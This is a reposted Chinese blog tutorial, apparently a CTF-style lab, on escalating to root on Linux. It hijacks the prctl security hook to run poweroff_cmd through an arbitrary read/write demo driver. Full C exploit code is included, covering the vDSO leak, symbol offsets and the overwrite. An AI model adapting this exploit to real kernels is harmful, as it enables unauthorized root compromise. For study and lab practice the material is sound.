linux 内核提权总结(demo+exp分析) -- 任意读写(三)

34 篇文章 6 订阅
20 篇文章 7 订阅

hijack_prctl篇

本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm

 

  • prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互

    1. 用户态执行prctl函数后触发prctl系统调用
    2. 内核接收参数后执行security_task_prctl
    3. security_task_prctl执行hook.task_prctl
  • poweroff_work_func函数: 内核函数,执行 run_cmd(poweroff_cmd),即root权限执行poweroff_cmd

  • 攻击流程:

    1. 劫持hook.task_prctl为目标函数地址(poweroff_work_func)
    2. 修改poweroff_cmd为目标指令
    3. 用户执行prctl函数,触发

一. 利用步骤

1. 定位内核加载基地址(开启kaslr)

  • 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址

2. 定位hook.prctl,poweroff_cmd地址

  • gdb调试内核并在security_task_prctl函数处下断点,用户态程序执行prctl函数,进入security_task_prctl函数,单步执行汇编指令,通过内存查看hook.task_prctl 地址

  • gdb 执行 p poweroff_cmd,获得poweroff_cmd真实地址

  • 获得hook.prctl,poweroff_cmd与内核基地址固定偏移

3. 修改poweroff_cmd 为任意指令

4. 用户态执行prctl函数,触发

二. 驱动代码

见cred篇:linux 内核提权总结(demo+exp分析) -- 任意读写(一)

三. exp

#define _GNU_SOURCE
 
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/auxv.h>
#include <sys/prctl.h>
 
#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002
#define SET_MEM 0X100003
 
size_t poweroff_cmd = 0;
size_t prctl_hook = 0;
size_t poweroff_work_func = 0;
size_t vmlinux_base = 0;
 
struct vunl
{
    char *point;
    size_t size;
} VUNL;
 
void leak_data(int fd, char *buf)
{
    char *res = NULL;
 
    VUNL.size = 0x1000;
    for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffffff; addr += 0x1000)
    {
        VUNL.point = (char *)addr;
 
        ioctl(fd, CHANGE_POINT, &VUNL); //change the point
        ioctl(fd, RW_READ, buf);
        if (!strcmp("gettimeofday", buf + 0x2b5))
        {
            printf("[+] the addr of VDSO is: 0x%lx\n", addr);
            vmlinux_base = addr & 0xffffffffff000000;
            printf("[+] the addr of vmlinux base is: 0x%lx\n", vmlinux_base);
            break;
        }
 
        puts("[-] not found, try again!\n");
    }
    return;
}
 
int main(int argc, char *argv[])
{
    int fd = 0;
    char *buf = malloc(0x1000);
    char cmd[] = "/bin/chmod 777 /flag\x00";
 
    fd = open("/dev/rw_any_dev", O_RDWR);
    leak_data(fd, buf);
    poweroff_cmd = vmlinux_base + 0xe3e1a0;
    prctl_hook = vmlinux_base + 0xe81078;
    poweroff_work_func = vmlinux_base + 0x075480;
 
    printf("[+] the addr of poweroff_cmd is: 0x%lx\n", poweroff_cmd);
    printf("[+] the addr of prctl hook is: 0x%lx\n", prctl_hook);
    printf("[+] the addr of orderly_poweroff is: 0x%lx\n", poweroff_work_func);
 
    VUNL.size = strlen(cmd)+1;
    // VUNL.size = strlen(argv[1])+1;
    VUNL.point = (char *)poweroff_cmd;
    ioctl(fd, CHANGE_POINT, &VUNL);
    ioctl(fd, RW_WRITE, cmd);
    // ioctl(fd, RW_WRITE, argv[1]);
 
    VUNL.size = 8;
    VUNL.point = (char *)prctl_hook;
    ioctl(fd, CHANGE_POINT, &VUNL);
    ioctl(fd, RW_WRITE, &poweroff_work_func);
    puts("[+] the cmd arg must have an ansolute_address");
    prctl(PR_GET_NAME, "test");
 
    return 0;
}

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值